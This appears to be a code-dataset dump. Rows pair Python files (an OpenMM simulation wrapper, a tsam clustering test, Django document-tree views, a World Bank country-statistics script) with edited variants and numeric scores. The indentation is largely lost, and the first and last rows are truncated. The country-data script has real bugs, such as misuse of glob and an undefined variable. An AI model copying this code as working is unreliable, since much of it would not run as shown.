if isinstance(file, str):
with open(file, 'r') as f:
xml = f.read()
else:
xml = file.read()
self.context.setState(mm.XmlSerializer.deserialize(xml)) | 3rdparty/openmm/wrappers/python/simtk/openmm/app/simulation.py | from __future__ import absolute_import
__author__ = "<NAME>"
__version__ = "1.0"
import simtk.openmm as mm
import simtk.unit as unit
import sys
from datetime import datetime, timedelta
try:
string_types = (unicode, str)
except NameError:
string_types = (str,)
class Simulation(object):
"""Simulation provides a simplified API for running simulations with OpenMM and reporting results.
A Simulation ties together various objects used for running a simulation: a Topology, System,
Integrator, and Context. To use it, you provide the Topology, System, and Integrator, and it
creates the Context automatically.
Simulation also maintains a list of "reporter" objects that record or analyze data as the simulation
runs, such as writing coordinates to files or displaying structures on the screen. For example,
the following line will cause a file called "output.pdb" to be created, and a structure written to
it every 1000 time steps:
simulation.reporters.append(PDBReporter('output.pdb', 1000))
"""
def __init__(self, topology, system, integrator, platform=None, platformProperties=None, state=None):
"""Create a Simulation.
Parameters
----------
topology : Topology
A Topology describing the the system to simulate
system : System or XML file name
The OpenMM System object to simulate (or the name of an XML file
with a serialized System)
integrator : Integrator or XML file name
The OpenMM Integrator to use for simulating the System (or the name
of an XML file with a serialized System)
platform : Platform=None
If not None, the OpenMM Platform to use
platformProperties : map=None
If not None, a set of platform-specific properties to pass to the
Context's constructor
state : XML file name=None
The name of an XML file containing a serialized State. If not None,
the information stored in state will be transferred to the generated
Simulation object.
"""
self.topology = topology
## The System being simulated
if isinstance(system, string_types):
with open(system, 'r') as f:
self.system = mm.XmlSerializer.deserialize(f.read())
else:
self.system = system
## The Integrator used to advance the simulation
if isinstance(integrator, string_types):
with open(integrator, 'r') as f:
self.integrator = mm.XmlSerializer.deserialize(f.read())
else:
self.integrator = integrator
## The index of the current time step
self.currentStep = 0
## A list of reporters to invoke during the simulation
self.reporters = []
if platform is None:
## The Context containing the current state of the simulation
self.context = mm.Context(self.system, self.integrator)
elif platformProperties is None:
self.context = mm.Context(self.system, self.integrator, platform)
else:
self.context = mm.Context(self.system, self.integrator, platform, platformProperties)
if state is not None:
with open(state, 'r') as f:
self.context.setState(mm.XmlSerializer.deserialize(f.read()))
## Determines whether or not we are using PBC. Try from the System first,
## fall back to Topology if that doesn't work
try:
self._usesPBC = self.system.usesPeriodicBoundaryConditions()
except Exception: # OpenMM just raises Exception if it's not implemented everywhere
self._usesPBC = topology.getUnitCellDimensions() is not None
def minimizeEnergy(self, tolerance=10*unit.kilojoule/unit.mole, maxIterations=0):
"""Perform a local energy minimization on the system.
Parameters
----------
tolerance : energy=10*kilojoules/mole
The energy tolerance to which the system should be minimized
maxIterations : int=0
The maximum number of iterations to perform. If this is 0,
minimization is continued until the results converge without regard
to how many iterations it takes.
"""
mm.LocalEnergyMinimizer.minimize(self.context, tolerance, maxIterations)
def step(self, steps):
"""Advance the simulation by integrating a specified number of time steps."""
self._simulate(endStep=self.currentStep+steps)
def runForClockTime(self, time, checkpointFile=None, stateFile=None, checkpointInterval=None):
"""Advance the simulation by integrating time steps until a fixed amount of clock time has elapsed.
This is useful when you have a limited amount of computer time available, and want to run the longest simulation
possible in that time. This method will continue taking time steps until the specified clock time has elapsed,
then return. It also can automatically write out a checkpoint and/or state file before returning, so you can
later resume the simulation. Another option allows it to write checkpoints or states at regular intervals, so
you can resume even if the simulation is interrupted before the time limit is reached.
Parameters
----------
time : time
the amount of time to run for. If no units are specified, it is
assumed to be a number of hours.
checkpointFile : string or file=None
if specified, a checkpoint file will be written at the end of the
simulation (and optionally at regular intervals before then) by
passing this to saveCheckpoint().
stateFile : string or file=None
if specified, a state file will be written at the end of the
simulation (and optionally at regular intervals before then) by
passing this to saveState().
checkpointInterval : time=None
if specified, checkpoints and/or states will be written at regular
intervals during the simulation, in addition to writing a final
version at the end. If no units are specified, this is assumed to
be in hours.
"""
if unit.is_quantity(time):
time = time.value_in_unit(unit.hours)
if unit.is_quantity(checkpointInterval):
checkpointInterval = checkpointInterval.value_in_unit(unit.hours)
endTime = datetime.now()+timedelta(hours=time)
while (datetime.now() < endTime):
if checkpointInterval is None:
nextTime = endTime
else:
nextTime = datetime.now()+timedelta(hours=checkpointInterval)
if nextTime > endTime:
nextTime = endTime
self._simulate(endTime=nextTime)
if checkpointFile is not None:
self.saveCheckpoint(checkpointFile)
if stateFile is not None:
self.saveState(stateFile)
def _simulate(self, endStep=None, endTime=None):
if endStep is None:
endStep = sys.maxsize
nextReport = [None]*len(self.reporters)
while self.currentStep < endStep and (endTime is None or datetime.now() < endTime):
nextSteps = endStep-self.currentStep
# Find when the next report will happen.
anyReport = False
for i, reporter in enumerate(self.reporters):
nextReport[i] = reporter.describeNextReport(self)
if nextReport[i][0] > 0 and nextReport[i][0] <= nextSteps:
nextSteps = nextReport[i][0]
anyReport = True
stepsToGo = nextSteps
while stepsToGo > 10:
self.integrator.step(10) # Only take 10 steps at a time, to give Python more chances to respond to a control-c.
stepsToGo -= 10
self.currentStep += 10
if endTime is not None and datetime.now() >= endTime:
return
self.integrator.step(stepsToGo)
self.currentStep += stepsToGo
if anyReport:
# One or more reporters are ready to generate reports. Organize them into three
# groups: ones that want wrapped positions, ones that want unwrapped positions,
# and ones that don't care about positions.
wrapped = []
unwrapped = []
either = []
for reporter, report in zip(self.reporters, nextReport):
if report[0] == nextSteps:
if len(report) > 5:
wantWrap = report[5]
if wantWrap is None:
wantWrap = self._usesPBC
else:
wantWrap = self._usesPBC
if not report[1]:
either.append((reporter, report))
elif wantWrap:
wrapped.append((reporter, report))
else:
unwrapped.append((reporter, report))
if len(wrapped) > len(unwrapped):
wrapped += either
else:
unwrapped += either
# Generate the reports.
if len(wrapped) > 0:
self._generate_reports(wrapped, True)
if len(unwrapped) > 0:
self._generate_reports(unwrapped, False)
def _generate_reports(self, reports, periodic):
getPositions = False
getVelocities = False
getForces = False
getEnergy = False
for reporter, next in reports:
if next[1]:
getPositions = True
if next[2]:
getVelocities = True
if next[3]:
getForces = True
if next[4]:
getEnergy = True
state = self.context.getState(getPositions=getPositions, getVelocities=getVelocities, getForces=getForces,
getEnergy=getEnergy, getParameters=True, enforcePeriodicBox=periodic)
for reporter, next in reports:
reporter.report(self, state)
def saveCheckpoint(self, file):
"""Save a checkpoint of the simulation to a file.
The output is a binary file that contains a complete representation of the current state of the Simulation.
It includes both publicly visible data such as the particle positions and velocities, and also internal data
such as the states of random number generators. Reloading the checkpoint will put the Simulation back into
precisely the same state it had before, so it can be exactly continued.
A checkpoint file is highly specific to the Simulation it was created from. It can only be loaded into
another Simulation that has an identical System, uses the same Platform and OpenMM version, and is running on
identical hardware. If you need a more portable way to resume simulations, consider using saveState() instead.
Parameters
----------
file : string or file
a File-like object to write the checkpoint to, or alternatively a
filename
"""
if isinstance(file, str):
with open(file, 'wb') as f:
f.write(self.context.createCheckpoint())
else:
file.write(self.context.createCheckpoint())
def loadCheckpoint(self, file):
"""Load a checkpoint file that was created with saveCheckpoint().
Parameters
----------
file : string or file
a File-like object to load the checkpoint from, or alternatively a
filename
"""
if isinstance(file, str):
with open(file, 'rb') as f:
self.context.loadCheckpoint(f.read())
else:
self.context.loadCheckpoint(file.read())
def saveState(self, file):
"""Save the current state of the simulation to a file.
The output is an XML file containing a serialized State object. It includes all publicly visible data,
including positions, velocities, and parameters. Reloading the State will put the Simulation back into
approximately the same state it had before.
Unlike saveCheckpoint(), this does not store internal data such as the states of random number generators.
Therefore, you should not expect the following trajectory to be identical to what would have been produced
with the original Simulation. On the other hand, this means it is portable across different Platforms or
hardware.
Parameters
----------
file : string or file
a File-like object to write the state to, or alternatively a
filename
"""
state = self.context.getState(getPositions=True, getVelocities=True, getParameters=True)
xml = mm.XmlSerializer.serialize(state)
if isinstance(file, str):
with open(file, 'w') as f:
f.write(xml)
else:
file.write(xml)
def loadState(self, file):
"""Load a State file that was created with saveState().
Parameters
----------
file : string or file
a File-like object to load the state from, or alternatively a
filename
"""
if isinstance(file, str):
with open(file, 'r') as f:
xml = f.read()
else:
xml = file.read()
self.context.setState(mm.XmlSerializer.deserialize(xml)) | 0.648911 | 0.416381 |
import os
import time
import pandas as pd
import numpy as np
import tsam.timeseriesaggregation as tsam
def test_cluster_order():
    """Regression test: aggregations built with a predefined cluster order
    (and, optionally, predefined cluster centers) taken from a wind-only
    aggregation must reproduce the stored reference typical periods.
    """
    examples = os.path.join(os.path.dirname(__file__), '..', 'examples')
    raw = pd.read_csv(os.path.join(examples, 'testdata.csv'), index_col=0)
    raw_wind = raw.loc[:, 'Wind'].to_frame()
    orig_raw_predefClusterOrder = pd.read_csv(
        os.path.join(examples, 'results', 'testperiods_predefClusterOrder.csv'),
        index_col=[0, 1])
    orig_raw_predefClusterOrderAndClusterCenters = pd.read_csv(
        os.path.join(examples, 'results',
                     'testperiods_predefClusterOrderAndClusterCenters.csv'),
        index_col=[0, 1])
    starttime = time.time()
    # Cluster on wind alone; its clusterOrder / clusterCenterIndices are then
    # reused for the aggregations over the full data set.
    aggregation_wind = tsam.TimeSeriesAggregation(
        raw_wind, noTypicalPeriods=8, hoursPerPeriod=24,
        clusterMethod='hierarchical')
    aggregation_wind.createTypicalPeriods()  # populates clusterOrder/centers
    aggregation_predefClusterOrder = tsam.TimeSeriesAggregation(
        raw, noTypicalPeriods=8, hoursPerPeriod=24,
        clusterMethod='hierarchical',
        predefClusterOrder=aggregation_wind.clusterOrder)
    typPeriods_predefClusterOrder = aggregation_predefClusterOrder.createTypicalPeriods()
    aggregation_predefClusterOrderAndClusterCenters = tsam.TimeSeriesAggregation(
        raw, noTypicalPeriods=8, hoursPerPeriod=24,
        clusterMethod='hierarchical',
        predefClusterOrder=aggregation_wind.clusterOrder,
        predefClusterCenterIndices=aggregation_wind.clusterCenterIndices)
    typPeriods_predefClusterOrderAndClusterCenters = (
        aggregation_predefClusterOrderAndClusterCenters.createTypicalPeriods())
    print('Clustering took ' + str(time.time() - starttime))

    # Sort the typical days so the assertions cannot fail on ordering alone.
    # BUG FIX: DataFrame.sum(axis=0, level=0) was deprecated in pandas 1.3 and
    # removed in 2.0; groupby(level=0).sum() is the documented equivalent.
    def daily_order(frame):
        return frame.groupby(level=0).sum().sort_values('GHI').index

    sortedDaysOrig1 = daily_order(orig_raw_predefClusterOrder)
    sortedDaysTest1 = daily_order(typPeriods_predefClusterOrder)
    sortedDaysOrig2 = daily_order(orig_raw_predefClusterOrderAndClusterCenters)
    sortedDaysTest2 = daily_order(typPeriods_predefClusterOrderAndClusterCenters)
    # Rearrange both the reference and the freshly computed periods.
    orig1 = orig_raw_predefClusterOrder[typPeriods_predefClusterOrder.columns].unstack().loc[sortedDaysOrig1, :].stack()
    test1 = typPeriods_predefClusterOrder.unstack().loc[sortedDaysTest1, :].stack()
    orig2 = orig_raw_predefClusterOrderAndClusterCenters[typPeriods_predefClusterOrderAndClusterCenters.columns].unstack().loc[sortedDaysOrig2, :].stack()
    test2 = typPeriods_predefClusterOrderAndClusterCenters.unstack().loc[sortedDaysTest2, :].stack()
    np.testing.assert_array_almost_equal(orig1.values, test1[orig1.columns].values, decimal=4)
    np.testing.assert_array_almost_equal(orig2.values, test2[orig2.columns].values, decimal=4)
if __name__ == "__main__":
test_cluster_order() | test/test_cluster_order.py | import os
import time
import pandas as pd
import numpy as np
import tsam.timeseriesaggregation as tsam
def test_cluster_order():
    """Regression test: aggregations built with a predefined cluster order
    (and, optionally, predefined cluster centers) taken from a wind-only
    aggregation should reproduce the stored reference typical periods.
    """
    raw = pd.read_csv(os.path.join(os.path.dirname(__file__),'..','examples','testdata.csv'), index_col = 0)
    raw_wind = raw.loc[:, 'Wind'].to_frame()
    # Reference results produced by earlier runs, used as ground truth below.
    orig_raw_predefClusterOrder = pd.read_csv(os.path.join(os.path.dirname(__file__),'..','examples','results','testperiods_predefClusterOrder.csv'), index_col = [0,1])
    orig_raw_predefClusterOrderAndClusterCenters = pd.read_csv(os.path.join(os.path.dirname(__file__), '..', 'examples', 'results', 'testperiods_predefClusterOrderAndClusterCenters.csv'),index_col=[0, 1])
    starttime = time.time()
    # Cluster on the wind column alone; createTypicalPeriods() populates
    # clusterOrder / clusterCenterIndices which are reused below.
    aggregation_wind = tsam.TimeSeriesAggregation(raw_wind, noTypicalPeriods = 8, hoursPerPeriod = 24,
                                                clusterMethod = 'hierarchical')
    typPeriods_wind = aggregation_wind.createTypicalPeriods()
    aggregation_predefClusterOrder = tsam.TimeSeriesAggregation(raw, noTypicalPeriods=8, hoursPerPeriod=24,
                                                clusterMethod='hierarchical',
                                                predefClusterOrder=aggregation_wind.clusterOrder)
    typPeriods_predefClusterOrder = aggregation_predefClusterOrder.createTypicalPeriods()
    aggregation_predefClusterOrderAndClusterCenters = tsam.TimeSeriesAggregation(raw,
                                                noTypicalPeriods=8, hoursPerPeriod=24,
                                                clusterMethod='hierarchical',
                                                predefClusterOrder=aggregation_wind.clusterOrder,
                                                predefClusterCenterIndices=aggregation_wind.clusterCenterIndices)
    typPeriods_predefClusterOrderAndClusterCenters = aggregation_predefClusterOrderAndClusterCenters.createTypicalPeriods()
    print('Clustering took ' + str(time.time() - starttime))
    # sort the typical days in order to avoid error assertion due to different order
    # NOTE(review): DataFrame.sum(axis=0, level=0) is deprecated (removed in
    # pandas 2.0); groupby(level=0).sum() is the modern equivalent.
    sortedDaysOrig1 = orig_raw_predefClusterOrder.sum(axis=0,level=0).sort_values('GHI').index
    sortedDaysTest1 = typPeriods_predefClusterOrder.sum(axis=0,level=0).sort_values('GHI').index
    sortedDaysOrig2 = orig_raw_predefClusterOrderAndClusterCenters.sum(axis=0,level=0).sort_values('GHI').index
    sortedDaysTest2 = typPeriods_predefClusterOrderAndClusterCenters.sum(axis=0,level=0).sort_values('GHI').index
    # rearange their order
    orig1 = orig_raw_predefClusterOrder[typPeriods_predefClusterOrder.columns].unstack().loc[sortedDaysOrig1,:].stack()
    test1 = typPeriods_predefClusterOrder.unstack().loc[sortedDaysTest1,:].stack()
    orig2 = orig_raw_predefClusterOrderAndClusterCenters[typPeriods_predefClusterOrderAndClusterCenters.columns].unstack().loc[sortedDaysOrig2,:].stack()
    test2 = typPeriods_predefClusterOrderAndClusterCenters.unstack().loc[sortedDaysTest2,:].stack()
    np.testing.assert_array_almost_equal(orig1.values, test1[orig1.columns].values,decimal=4)
    np.testing.assert_array_almost_equal(orig2.values, test2[orig2.columns].values, decimal=4)
if __name__ == "__main__":
test_cluster_order() | 0.31785 | 0.274655 |
from django.contrib.auth.decorators import login_required
from django.shortcuts import get_object_or_404, render
from django.urls import reverse
from rest_framework import status
from rest_framework.generics import GenericAPIView
from rest_framework.parsers import JSONParser
from rest_framework.renderers import BrowsableAPIRenderer, JSONRenderer
from rest_framework.response import Response
from document.models import DocNode
from document.parsers import AkomaNtosoParser
from document.renderers import AkomaNtosoRenderer, BrowsableAkomaNtosoRenderer
from document.serializers.doc_cursor import DocCursorSerializer
from document.tree import DocCursor
from reqs.views.policies import policy_or_404
class TreeView(GenericAPIView):
    """API view over a policy's document tree.

    GET serializes the tree rooted at an optional node identifier; PUT
    replaces the entire document for a policy. Content is negotiated
    between JSON and Akoma Ntoso renderers/parsers.
    """
    serializer_class = DocCursorSerializer
    renderer_classes = (JSONRenderer, BrowsableAPIRenderer,
                        AkomaNtosoRenderer, BrowsableAkomaNtosoRenderer)
    parser_classes = (JSONParser, AkomaNtosoParser)
    queryset = DocNode.objects.none() # Used to determine permissions
    def get_object(self, prefetch_related=True):
        """Return a DocCursor for the requested node (404 when absent).

        Anonymous users only see published policies. When no identifier is
        given in the URL, the document root (depth 0) is used.
        """
        only_published = not self.request.user.is_authenticated
        policy = policy_or_404(self.kwargs['policy_id'], only_published)
        # we'll pass this policy down when we serialize
        self.policy = policy
        query_args = {'policy_id': policy.pk}
        if self.kwargs.get('identifier'):
            query_args['identifier'] = self.kwargs['identifier']
        else:
            query_args['depth'] = 0
        queryset = DocNode.objects
        if prefetch_related:
            queryset = queryset.prefetch_annotations()
        root_doc = get_object_or_404(queryset, **query_args)
        root = DocCursor.load_from_model(root_doc, subtree=False)
        if prefetch_related:
            # attach the full subtree (with annotations) to the cursor
            root.add_models(root_doc.descendants().prefetch_annotations())
        self.check_object_permissions(self.request, root)
        return root
    def get_serializer_context(self):
        """Expose the policy resolved in get_object() to the serializer."""
        return {
            'policy': getattr(self, 'policy', None),
        }
    def get(self, request, *args, **kwargs):
        """Serialize and return the requested document (sub)tree."""
        instance = self.get_object(prefetch_related=True)
        serializer = self.get_serializer(instance)
        return Response(serializer.data)
    def put(self, request, *args, **kwargs):
        """Replace the whole document for this policy with the payload."""
        if self.kwargs.get('identifier'):
            return Response({
                'detail': 'Identifiers are unsupported on PUT requests.',
            }, status=status.HTTP_400_BAD_REQUEST)
        # We don't care about prefetching related data because we're
        # about to delete all of it anyways.
        instance = self.get_object(prefetch_related=False)
        serializer = self.get_serializer(instance, data=request.data)
        serializer.is_valid(raise_exception=True)
        serializer.save()
        return Response(status=status.HTTP_204_NO_CONTENT)
def render_editor(request, policy_id, filename, title):
    """Render the editor template *filename* for *policy_id*.

    Raises Http404 (via policy_or_404) when the policy does not exist.
    Only the document API URL is passed to the template; the document body
    itself is fetched client-side.
    """
    policy_or_404(policy_id, only_published=False)
    context = {
        'document_url': reverse('document', kwargs={'policy_id': policy_id}),
        'title': title,
    }
    return render(request, filename, context)
@login_required
def editor(request, policy_id):
    """Serve the rich-text document editor page (login required)."""
    return render_editor(
        request, policy_id, 'document/editor.html', 'Document Editor')
@login_required
def editor_akn(request, policy_id):
return render_editor(request, policy_id, 'document/editor_akn.html',
'Akoma Ntoso Editor') | api/document/views.py | from django.contrib.auth.decorators import login_required
from django.shortcuts import get_object_or_404, render
from django.urls import reverse
from rest_framework import status
from rest_framework.generics import GenericAPIView
from rest_framework.parsers import JSONParser
from rest_framework.renderers import BrowsableAPIRenderer, JSONRenderer
from rest_framework.response import Response
from document.models import DocNode
from document.parsers import AkomaNtosoParser
from document.renderers import AkomaNtosoRenderer, BrowsableAkomaNtosoRenderer
from document.serializers.doc_cursor import DocCursorSerializer
from document.tree import DocCursor
from reqs.views.policies import policy_or_404
class TreeView(GenericAPIView):
    """API view over a policy's document tree.

    GET serializes the tree rooted at an optional node identifier; PUT
    replaces the entire document for a policy. Content is negotiated
    between JSON and Akoma Ntoso renderers/parsers.
    """
    serializer_class = DocCursorSerializer
    renderer_classes = (JSONRenderer, BrowsableAPIRenderer,
                        AkomaNtosoRenderer, BrowsableAkomaNtosoRenderer)
    parser_classes = (JSONParser, AkomaNtosoParser)
    queryset = DocNode.objects.none() # Used to determine permissions
    def get_object(self, prefetch_related=True):
        """Return a DocCursor for the requested node, raising 404 when the
        policy or node cannot be found.

        Anonymous users only see published policies; without a URL
        identifier the document root (depth 0) is selected.
        """
        hide_unpublished = not self.request.user.is_authenticated
        # stash the policy so get_serializer_context can hand it down
        self.policy = policy_or_404(self.kwargs['policy_id'], hide_unpublished)
        filters = {'policy_id': self.policy.pk}
        identifier = self.kwargs.get('identifier')
        if identifier:
            filters['identifier'] = identifier
        else:
            filters['depth'] = 0
        nodes = DocNode.objects
        if prefetch_related:
            nodes = nodes.prefetch_annotations()
        model = get_object_or_404(nodes, **filters)
        cursor = DocCursor.load_from_model(model, subtree=False)
        if prefetch_related:
            cursor.add_models(model.descendants().prefetch_annotations())
        self.check_object_permissions(self.request, cursor)
        return cursor
    def get_serializer_context(self):
        """Expose the policy resolved in get_object() to the serializer."""
        return {'policy': getattr(self, 'policy', None)}
    def get(self, request, *args, **kwargs):
        """Serialize and return the requested document (sub)tree."""
        cursor = self.get_object(prefetch_related=True)
        return Response(self.get_serializer(cursor).data)
    def put(self, request, *args, **kwargs):
        """Replace the whole document for this policy with the payload."""
        if self.kwargs.get('identifier'):
            return Response({
                'detail': 'Identifiers are unsupported on PUT requests.',
            }, status=status.HTTP_400_BAD_REQUEST)
        # No prefetching: the existing tree is about to be discarded anyway.
        cursor = self.get_object(prefetch_related=False)
        serializer = self.get_serializer(cursor, data=request.data)
        serializer.is_valid(raise_exception=True)
        serializer.save()
        return Response(status=status.HTTP_204_NO_CONTENT)
def render_editor(request, policy_id, filename, title):
    """Render the editor template *filename* for *policy_id* with page *title*.

    Raises Http404 (via policy_or_404) when the policy does not exist,
    regardless of publication status.
    """
    # Verify that the policy is valid; 404 when not. We don't actually load
    # the document content as they'll be retrieved from the API
    policy_or_404(policy_id, only_published=False)
    return render(request, filename, {
        'document_url': reverse('document', kwargs={'policy_id': policy_id}),
        'title': title,
    })
@login_required
def editor(request, policy_id):
    """Serve the document editor page for *policy_id* (login required)."""
    return render_editor(request, policy_id, 'document/editor.html',
                         'Document Editor')
@login_required
def editor_akn(request, policy_id):
return render_editor(request, policy_id, 'document/editor_akn.html',
'Akoma Ntoso Editor') | 0.558809 | 0.12166 |
import json, glob, os
import logging
import pandas as pd
import world_bank_data as wb
import netCDF4 as nc
# Paths resolved relative to this module: ``country_data`` holds the
# per-country json files, ``datasets`` the cached source data read below
# (wdi csv cache, UN country-profile json).
countrymasks = os.path.dirname(__file__)
country_data_path = os.path.join(countrymasks, 'country_data')
datasets = os.path.join(countrymasks, 'datasets')
class Variable:
    """One country-level indicator, resolvable from the World Bank WDI API
    (``wdi_code``) and/or a local UN country-profile json (``un_code``).
    """
    def __init__(self, type, label, unit, wdi_code=None, un_code=None, alias=None, wdi_scale=1):
        self.type = type
        self.label = label
        self.alias = alias or type.lower()
        self.unit = unit
        self.wdi_code = wdi_code
        self.wdi_scale = wdi_scale  # multiplier applied to raw WDI values (e.g. 1e-6 -> millions)
        self.un_code = un_code
        # caches filled lazily by the ``wdi`` / ``un`` properties
        self._wdi = None
        self._un = None
    def load_wdi(self):
        """Return the WDI time series, preferring the on-disk csv cache and
        falling back to (then caching) a World Bank API download.

        Raises ValueError when this variable has no ``wdi_code``.
        """
        if not self.wdi_code:
            raise ValueError('{}: no associated WDI variable'.format(self.label))
        fname = os.path.join(datasets, 'wdi', self.wdi_code+'.csv')
        try:
            timeseries = pd.read_csv(fname, index_col=('Country','Year'))[self.wdi_code]
        except Exception:  # was a bare except: -- never trap SystemExit/KeyboardInterrupt
            # NOTE: mrv=1 for most recent value would be equivalent to subsequent treatment
            # ....: except that sometimes it results to NaN (e.g CO2 emissions for PSE, Palestine)
            timeseries = wb.get_series(self.wdi_code, id_or_value='id', simplify_index=True)
            timeseries.to_csv(fname)
        return timeseries
    # lazy loading
    @property
    def wdi(self):
        if self._wdi is None:
            self._wdi = self.load_wdi()
        return self._wdi
    @property
    def un(self):
        if not self.un_code:
            raise ValueError('{}: no associated UN variable'.format(self.label))
        if self._un is None:
            # BUG FIX: json.load expects a file object, not a path string --
            # the original passed os.path.join(...) directly and would raise.
            with open(os.path.join(datasets, 'countryprofiledata.json')) as f:
                self._un = json.load(f)
        return self._un
    def get_wdi(self, country_code):
        """Most recent non-NaN WDI value for *country_code*, scaled by
        ``wdi_scale``; NaN (with a warning) when unavailable."""
        try:
            value = self.wdi.loc[country_code].dropna().values[-1]*self.wdi_scale
        except Exception:  # unknown country code or all-NaN series
            value = float('nan')
            logging.warning('no valid WDI value for {},{}'.format(country_code, self.wdi_code))
        return value
    def get_un(self, country_code):
        """UN profile value for *country_code*; NaN (with a warning) when
        unavailable."""
        try:
            return self.un[country_code][self.un_code]
        except Exception:
            logging.warning('no valid UN value for {},{}'.format(country_code, self.un_code))
            return float('nan')
    def get(self, country_code):
        """Fetch the value for *country_code*, preferring WDI over UN data.

        Raises ValueError when neither code is configured.
        """
        if self.wdi_code:
            return self.get_wdi(country_code)
        elif self.un_code:
            return self.get_un(country_code)
        raise ValueError('no method provided')
    def to_dict(self, value, rank=None):
        """Serializable record of this variable carrying *value* and *rank*."""
        return {
            'type': self.type,
            'label': self.label,
            'unit': self.unit,
            'value': value,
            'rank': rank,
            'un_code': self.un_code,
            'wdi_code': self.wdi_code,
        }
# https://data.worldbank.org/indicator/AG.SRF.TOTL.K2
# AG.LND.TOTL.K2 : land area !
# Indicators exported for every country. Most are backed by a World Bank WDI
# code; HDI comes from the UN country-profile data. ``wdi_scale`` converts the
# raw unit (e.g. 1e-6 turns people into millions, 1e-9 turns $ into billions).
stats_variables = [
    Variable('POP_TOTL', label='Total population', unit='million people', alias='pop_total', wdi_code='SP.POP.TOTL', wdi_scale=1e-6),
    Variable('POP_DNST', label='Population density', unit='people/sq. km', alias='pop_density', wdi_code='EN.POP.DNST'),
    Variable('RUR_POP_PRCT', label='Rural population', unit='% of total population', alias='pop_rural', wdi_code='SP.RUR.TOTL.ZS'),
    Variable('URB_POP_PRCT', label='Urban population', unit='% of total population', alias='pop_urban', wdi_code='SP.URB.TOTL.IN.ZS'),
    Variable('POP_GROWTH', label='Population growth', unit='% per year', alias='pop_growth', wdi_code='SP.POP.GROW'),
    Variable('SURFACE_AREA', label='Surface area', unit='sq. km', alias='area', wdi_code='AG.SRF.TOTL.K2'),
    Variable('GDP_PPP', label='Gross Domestic Product, PPP', unit='billion $ (PPP, current)', alias='gdp_ppp', wdi_code='NY.GDP.MKTP.PP.CD', wdi_scale=1e-9),
    Variable('GDP_PER_CAPITA_PPP', label='GDP per capita, PPP', unit='$ (PPP, current)', alias='gdp_capita_ppp', wdi_code='NY.GDP.PCAP.PP.CD'),
    Variable('GDP', label='Gross Domestic Product', unit='billion $ (current)', alias='gdp', wdi_code='NY.GDP.MKTP.CD', wdi_scale=1e-9),
    Variable('GDP_PER_CAPITA', label='GDP per capita', unit='$ (current)', alias='gdp_capita', wdi_code='NY.GDP.PCAP.CD'),
    Variable('GDP_GROWTH', label='GDP growth', unit='annual %', alias='gdp_growth', wdi_code='NY.GDP.MKTP.KD.ZG'),
    Variable('POV_DDAY', label='Poverty headcount rank at $ 1.90 a day (2011 PPP)', unit='% of total population', alias='poverty', wdi_code='SI.POV.DDAY'),
    # Variable('CO2_EM_CAPITA', label='CO2 emissions per capita', unit='metric tons/capita', alias='co2_capita', wdi_code='EM.ATM.CO2E.PC'),
    Variable('CO2_EM', label='CO2 emissions', unit='kt', alias='co2', wdi_code='EN.ATM.CO2E.KT'),
    Variable('CO2_EM_INTENSITY', label='CO2 intensity', unit='kg per kg of oil equivalent energy use', wdi_code='EN.ATM.CO2E.EG.ZS'),
    Variable('CO2_EM_GDP', label='CO2 emissions per GDP', unit='kg per 2011 PPP $ of GDP', wdi_code='EN.ATM.CO2E.PP.GD.KD'),
    Variable('HDI', label='Human Development Index', unit='(-)', un_code='HDI_Human_development_index_HDIg_value'),
]
class CountryStats:
"""This is the class for the corresponding json file in country_data
"""
def __init__(self, name, type="country", sub_countries=[], code=None, stats=None):
self.name = name
self.type = type
self.code = code
self.sub_countries = sub_countries
self.stats = stats or []
def get(self, name, insert=False):
try:
i = [e['type'] for e in self.stats].index(name)
return self.stats[i]
except ValueError:
if insert:
e = {'type': name}
self.stats.append(e)
return e
else:
raise
def getvalue(self, name, missing=float('nan')):
try:
return self.get(name)['value']
except ValueError:
return missing
@classmethod
def load(cls, fname):
js = json.load(open(fname))
code = os.path.basename(os.path.dirname(fname))
return cls(js['name'], js.get('type', 'country'), js.get('sub-countries',[]), code=js.get('code', code), stats=js.get('stats', []))
def save(self, fname):
cdir = os.path.dirname(fname)
if not os.path.exists(cdir):
logging.info('create '+repr(cdir))
os.makedirs(cdir)
js = {
'name': self.name,
'code': self.code,
'type': self.type,
'sub-countries': self.sub_countries,
'stats': self.stats,
}
json.dump(js, open(fname, 'w'))
def __repr__(self):
return 'CountryStats({name}, {code})'.format(**vars(self))
class CountryStatDB:
def __init__(self, countries=None):
self.countries = countries or {}
@staticmethod
def cpath(code):
return os.path.join(country_data_path, code, '{}_general.json'.format(code))
@classmethod
def load(cls):
db = cls()
for root, codes, _ in glob.glob(country_data_path):
break
for c in codes:
cpath = os.path.join(country_data_path, c, '{}_general.json'.format(c))
try:
cstat = CountryStats.load(cpath)
except Exception as error:
logging.warning(str(error))
continue
db.countries[c] = stat
return db
def save(self):
for c, cstat in self.countries.items():
cpath = self.cpath(c)
cstat.save(cpath)
def main():
import argparse
parser = argparse.ArgumentParser()
x = parser.add_mutually_exclusive_group()
x.add_argument('--countries', nargs='+')
x.add_argument('--folder', action='store_true', help='read country codes from country_data folder')
# x.add_argument('--netcdf', '--nc', action='store_true', help='read country codes from default countrymasks.nc')
x.add_argument('--mask-file', help='read country code from netcdf mask file')
# x.add_argument('--shape-file', help='read country code from geojson shape file')
o = parser.parse_args()
wbcountries = wb.get_countries()
if o.countries:
codes = o.countries
elif o.mask_file:
with nc.Dataset(os.path.join(o.mask_file)) as ds:
codes = [v[2:] for v in ds.variables if v.startswith('m_')]
elif o.folder:
for root, codes, _ in os.walk(country_data_path):
break
else:
v = stats_variables[0]
codes = sorted(set(c for c, y in v.wdi.index))
countries = {}
for code in codes:
wbcode = 'WLD' if code == 'world' else code
if wbcode in wbcountries.index:
name = wbcountries.loc[wbcode]['name']
else:
logging.warning('{} not present in World Bank Database'.format(code))
logging.info('try countrymasks.nc')
try:
with nc.Dataset(os.path.join(countrymasks, 'countrymasks.nc')) as ds:
name = ds['m_'+code].long_name
except:
logging.warning('{} not present in countrymasks.nc'.format(code))
logging.warning('skip {}'.format(code))
continue
stats = [v.to_dict(v.get(wbcode)) for v in stats_variables]
countries[code] = CountryStats(name, code=code, type='country', sub_countries=[], stats=stats)
db = CountryStatDB(countries)
db.save()
if __name__ == '__main__':
main() | create_country_data.py | import json, glob, os
import logging
import pandas as pd
import world_bank_data as wb
import netCDF4 as nc
countrymasks = os.path.dirname(__file__)
country_data_path = os.path.join(countrymasks, 'country_data')
datasets = os.path.join(countrymasks, 'datasets')
class Variable:
def __init__(self, type, label, unit, wdi_code=None, un_code=None, alias=None, wdi_scale=1):
self.type = type
